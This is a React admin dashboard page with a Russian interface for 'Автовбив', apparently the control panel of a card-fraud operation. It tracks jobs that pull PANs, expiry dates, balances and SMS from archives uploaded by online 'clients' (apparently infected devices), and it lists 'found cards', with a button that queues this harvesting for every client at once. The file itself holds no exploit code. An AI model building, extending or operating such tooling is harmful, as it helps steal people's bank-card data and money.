import { fetchCardFillAdminCards, fetchCardFillAdminJobs, postCardFillEnqueueOnline } from '@/api/admin';
import { Button } from '@/components/ui/button';
import {
	Dialog,
	DialogContent,
	DialogDescription,
	DialogFooter,
	DialogHeader,
	DialogTitle,
} from '@/components/ui/dialog';
import { Spinner } from '@/components/ui/spinner';
import { useCardFillAdminSubscription } from '@/hooks/use-card-fill-admin-subscription';
import { filterHistoryJobs, type CardFillHistoryFilter } from '@/lib/card-fill-meta';
import { formatApiError } from '@/lib/format-api-error';
import { cn } from '@/lib/utils';
import axios from 'axios';
import { PageScroll } from '@/layouts/page-layout';
import CardFillCardsTable from '@/pages/admin/card-fill/card-fill-cards-table';
import CardFillJobsTable from '@/pages/admin/card-fill/card-fill-jobs-table';
import CardFillStatsBar from '@/pages/admin/card-fill/card-fill-stats-bar';
import { CreditCard, PlayIcon } from 'lucide-react';
import { useMemo, useState } from 'react';
import { toast } from 'sonner';

const HISTORY_FILTERS: { id: CardFillHistoryFilter; label: string }[] = [
	{ id: 'all', label: 'Все' },
	{ id: 'success', label: 'Успешные' },
	{ id: 'unsuccessful', label: 'Неуспешные' },
];

export default function AdminCardFillPage() {
	const { snapshot, connected, cancelJob, retryJob, appendHistory, appendCards } =
		useCardFillAdminSubscription();
	const [loadingMoreHistory, setLoadingMoreHistory] = useState(false);
	const [loadingMoreCards, setLoadingMoreCards] = useState(false);
	const [historyFilter, setHistoryFilter] = useState<CardFillHistoryFilter>('all');
	const [enqueueConfirmOpen, setEnqueueConfirmOpen] = useState(false);
	const [enqueueLoading, setEnqueueLoading] = useState(false);

	const filteredHistory = useMemo(
		() => (snapshot ? filterHistoryJobs(snapshot.history, historyFilter) : []),
		[snapshot, historyFilter],
	);

	const historyTitle =
		snapshot && historyFilter !== 'all'
			? `История (${filteredHistory.length} из ${snapshot.history.length})`
			: `История (${snapshot?.history.length ?? 0})`;

	async function loadMoreHistory() {
		if (!snapshot?.historyCursor || loadingMoreHistory) return;
		setLoadingMoreHistory(true);
		try {
			const page = await fetchCardFillAdminJobs({
				status: 'terminal',
				cursor: snapshot.historyCursor,
				limit: 50,
			});
			appendHistory(page.items, page.nextCursor);
		} catch {
			toast.error('Не удалось загрузить историю');
		} finally {
			setLoadingMoreHistory(false);
		}
	}

	async function loadMoreCards() {
		if (!snapshot?.cardsCursor || loadingMoreCards) return;
		setLoadingMoreCards(true);
		try {
			const page = await fetchCardFillAdminCards({
				cursor: snapshot.cardsCursor,
				limit: 50,
			});
			appendCards(page.items, page.nextCursor);
		} catch {
			toast.error('Не удалось загрузить карты');
		} finally {
			setLoadingMoreCards(false);
		}
	}

	async function handleEnqueueOnline() {
		setEnqueueLoading(true);
		try {
			const data = await postCardFillEnqueueOnline();
			if (data.clientsTotal === 0) {
				toast.message('Нет онлайн-клиентов в свежем окне ping');
			} else {
				const skippedTotal = Object.values(data.skipped).reduce((a, b) => a + b, 0);
				const zipSkippedTotal = Object.values(data.zipSkipped).reduce((a, b) => a + b, 0);
				toast.success(
					`Клиентов: ${data.clientsProcessed}/${data.clientsTotal}, jobs: ${data.jobsEnqueued}, ZIP ok: ${data.zipOk}/${data.zipClientsProcessed}, ZIP skip: ${zipSkippedTotal}, job skip: ${skippedTotal}`,
				);
			}
			setEnqueueConfirmOpen(false);
		} catch (error) {
			const message =
				(axios.isAxiosError(error) ? formatApiError(error.response?.data) : formatApiError(error)) ??
				'Не удалось запустить автовбив';
			toast.error(message);
		} finally {
			setEnqueueLoading(false);
		}
	}

	return (
		<PageScroll contentClassName='p-2 flex flex-col gap-4'>
			<div className='flex flex-wrap items-center gap-2'>
				<CreditCard className='text-chart-2' size={22} />
				<h1 className='text-lg font-semibold'>Автовбив</h1>
				<div className='ml-auto flex items-center gap-2'>
					{snapshot?.enabled ? (
						<Button
							type='button'
							size='sm'
							variant='secondary'
							className='gap-1.5'
							disabled={enqueueLoading || !connected}
							onClick={() => setEnqueueConfirmOpen(true)}
						>
							<PlayIcon className='size-3.5' />
							Автовбив всех онлайн
						</Button>
					) : null}
					{!connected || !snapshot ? (
						<span className='text-xs text-muted-foreground flex items-center gap-1'>
							<Spinner className='size-3' />
							Подключение…
						</span>
					) : !snapshot.enabled ? (
						<span className='text-xs text-muted-foreground'>Модуль выключен</span>
					) : (
						<span className='text-xs text-emerald-600 dark:text-emerald-400'>Live</span>
					)}
				</div>
			</div>

			<Dialog open={enqueueConfirmOpen} onOpenChange={open => !enqueueLoading && setEnqueueConfirmOpen(open)}>
				<DialogContent>
					<DialogHeader>
						<DialogTitle>Автовбив всех онлайн</DialogTitle>
						<DialogDescription>
							Сначала повторный разбор сохранённого launch ZIP (если файл есть на сервере): possible_cards,
							zip-resolve и SMS из архива. Затем очередь phone lookup, date, pan и balance для всех клиентов со
							свежим ping. Уже успешные шаги jobs не дублируются.
						</DialogDescription>
					</DialogHeader>
					<DialogFooter>
						<Button type='button' variant='outline' disabled={enqueueLoading} onClick={() => setEnqueueConfirmOpen(false)}>
							Отмена
						</Button>
						<Button type='button' disabled={enqueueLoading} onClick={() => void handleEnqueueOnline()}>
							{enqueueLoading ? 'Запуск…' : 'Запустить'}
						</Button>
					</DialogFooter>
				</DialogContent>
			</Dialog>

			{snapshot ? (
				<>
					<CardFillStatsBar
						enabled={snapshot.enabled}
						stats={snapshot.stats}
						workerHealth={snapshot.workerHealth}
					/>

					<CardFillJobsTable
						title={`Сейчас работает (${snapshot.running.length})`}
						jobs={snapshot.running}
						emptyText='Нет активных задач'
					/>

					<CardFillJobsTable
						title={`Очередь (${snapshot.pending.length})`}
						jobs={snapshot.pending}
						emptyText='Очередь пуста'
						onCancel={jobId => {
							cancelJob(jobId);
							toast.message('Отмена задачи…');
						}}
					/>

					<section className='space-y-2'>
						<h2 className='text-sm font-medium'>Найденные карты ({snapshot.cards.length})</h2>
						<CardFillCardsTable cards={snapshot.cards} emptyText='Карт от автовбива пока нет' />
						{snapshot.cardsCursor ? (
							<Button
								type='button'
								variant='outline'
								size='sm'
								disabled={loadingMoreCards}
								onClick={() => void loadMoreCards()}
							>
								{loadingMoreCards ? 'Загрузка…' : 'Загрузить ещё карты'}
							</Button>
						) : null}
					</section>

					<section className='space-y-2'>
						<div className='flex flex-col gap-2 sm:flex-row sm:items-center sm:justify-between'>
							<h2 className='text-sm font-medium'>{historyTitle}</h2>
							<div className='flex flex-wrap gap-1'>
								{HISTORY_FILTERS.map(filter => (
									<Button
										key={filter.id}
										type='button'
										size='sm'
										variant={historyFilter === filter.id ? 'secondary' : 'outline'}
										className={cn('h-7 text-xs', historyFilter === filter.id && 'font-medium')}
										onClick={() => setHistoryFilter(filter.id)}
									>
										{filter.label}
									</Button>
								))}
							</div>
						</div>
						{historyFilter === 'unsuccessful' ? (
							<p className='text-xs text-muted-foreground'>
								Ошибки, отмены, пустые ответы и пропуски (skipReason), в том числе со статусом «Готово».
							</p>
						) : null}
						<CardFillJobsTable
							title=''
							jobs={filteredHistory}
							emptyText={
								historyFilter === 'all'
									? 'История пуста'
									: 'Нет задач для выбранного фильтра'
							}
							onRetry={jobId => {
								retryJob(jobId);
								toast.message('Повтор задачи…');
							}}
						/>
						{snapshot.historyCursor ? (
							<Button
								type='button'
								variant='outline'
								size='sm'
								disabled={loadingMoreHistory}
								onClick={() => void loadMoreHistory()}
							>
								{loadingMoreHistory ? 'Загрузка…' : 'Загрузить ещё историю'}
							</Button>
						) : null}
					</section>
				</>
			) : (
				<div className='flex items-center justify-center py-16 text-muted-foreground gap-2'>
					<Spinner />
					Загрузка дашборда…
				</div>
			)}
		</PageScroll>
	);
}
